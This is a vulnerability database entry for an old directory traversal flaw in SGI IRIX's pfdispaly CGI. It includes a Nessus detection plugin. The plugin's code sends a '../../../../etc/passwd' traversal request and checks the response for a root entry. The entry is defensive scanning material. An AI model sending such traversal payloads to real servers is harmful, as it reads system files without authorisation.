Vulnerabilities > CVE-1999-0270 - Unspecified vulnerability in SGI Irix 6.2/6.3/6.4

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
sgi
nessus

Summary

Directory traversal vulnerability in pfdispaly.cgi program (sometimes referred to as "pfdisplay") for SGI's Performer API Search Tool (performer_tools) allows remote attackers to read arbitrary files.

Vulnerable Configurations

Part Description Count
OS
Sgi
3

Nessus

NASL familyCGI abuses
NASL idPFDIPALY.NASL
descriptionThe
last seen2020-06-01
modified2020-06-02
plugin id10174
published1999-06-22
reporterThis script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10174
titleIRIX pfdispaly Arbitrary File Access
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if(description)
{
 script_id(10174);
 script_version ("1.30");
 script_cvs_date("Date: 2018/08/13 14:32:36");
 script_cve_id("CVE-1999-0270");

 script_name(english:"IRIX pfdispaly Arbitrary File Access");
 
 script_set_attribute(attribute:"synopsis", value:
"It may be possible to read arbitrary files from the remote
system." );

 script_set_attribute(attribute:"description", value:
"The 'pfdispaly' CGI is installed. This CGI has a well known 
security flaw that lets an attacker read arbitrary files 
with the privileges of the http daemon (usually root or nobody)." );

 script_set_attribute(attribute:"solution", value:
"Remove it from /cgi-bin." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:N/A:N");

 script_set_attribute(attribute:"plugin_publication_date", value: "1999/06/22");
 script_set_attribute(attribute:"vuln_publication_date", value: "1998/04/02");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 script_summary(english: "Checks for the presence of /cgi-bin/pfdispaly");
 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
 script_family(english: "CGI abuses");
 script_dependencie("http_version.nasl", "no404.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);

foreach dir (cgi_dirs())
{
 foreach cgi (make_list("pfdispaly", "pfdispaly.cgi"))
 {
   r = http_send_recv3(method: 'GET', item: strcat(dir, "/", cgi, "?../../../../../../etc/passwd"), port:port);
  if (isnull(r)) exit(0);
  if (egrep(pattern:".*root:.*:0:[01]:.*", string:r[2]))
  {
    security_hole(port);
    exit(0);
  }
 }
}